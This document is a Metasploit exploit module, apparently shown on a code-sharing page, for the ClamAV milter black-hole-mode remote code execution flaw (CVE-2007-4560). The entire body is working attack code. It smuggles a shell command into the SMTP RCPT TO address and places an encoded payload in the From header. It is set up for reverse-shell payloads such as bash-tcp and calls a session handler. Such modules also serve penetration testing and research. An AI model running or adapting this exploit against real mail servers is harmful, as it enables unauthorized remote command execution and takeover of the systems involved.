Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Smtp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'ClamAV Milter Blackhole-Mode Remote Code Execution',
14
      'Description'    => %q{
15
          This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
16
        (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
17
        When implemented with black hole mode enabled, it is possible to execute
18
        commands remotely due to an insecure popen call.
19
      },
20
      'Author'         => [ 'aushack' ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'CVE', '2007-4560' ],
25
          [ 'OSVDB', '36909' ],
26
          [ 'BID', '25439' ],
27
          [ 'EDB', '4761' ]
28
        ],
29
      'Privileged'     => true,
30
      'Payload'        =>
31
        {
32
          'DisableNops' => true,
33
          'Space'       => 1024,
34
          'Compat'      =>
35
            {
36
              'PayloadType' => 'cmd cmd_bash',
37
              'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
38
            }
39
        },
40
      'Platform'       => 'unix',
41
      'Arch'           => ARCH_CMD,
42
      'Targets'        =>
43
        [
44
          [ 'Automatic', { }],
45
        ],
46
      'DisclosureDate' => '2007-08-24',
47
      'DefaultTarget'  => 0))
48

49
      register_options(
50
      [
51
        OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),
52
      ])
53
  end
54

55
  def exploit
56

57
    # ClamAV writes randomized msg.###### temporary files in a randomized
58
    # /tmp/clamav-#######################/ directory. This directory is
59
    # the clamav-milter process working directory.
60
    #
61
    # We *can* execute arbitrary code directly from 'sploit', however the
62
    # SMTP RFC rejects all payloads with the exception of generic CMD
63
    # payloads due to the IO redirects. I discovered that the 'From:'
64
    # header is written to this temporary file prior to the vulnerable
65
    # call, so we call the file itself and payload.encoded is executed.
66

67
    sploit = "sh msg*" # Execute the clamav-milter temporary file.
68

69
    # Create the malicious RCPT TO before connecting,
70
    # to make good use of the Msf::Exploit::Smtp support.
71

72
    oldaddr = datastore['MAILTO']
73
    newaddr = oldaddr.split('@')
74

75
    datastore['MAILTO'] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"
76

77
    connect_login
78

79
    sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header
80
    sock.put(".\r\n")
81

82
    # Clean up RCPT TO afterwards
83

84
    datastore['MAILTO'] = oldaddr
85

86
    handler
87
    disconnect
88
  end
89
end
90

91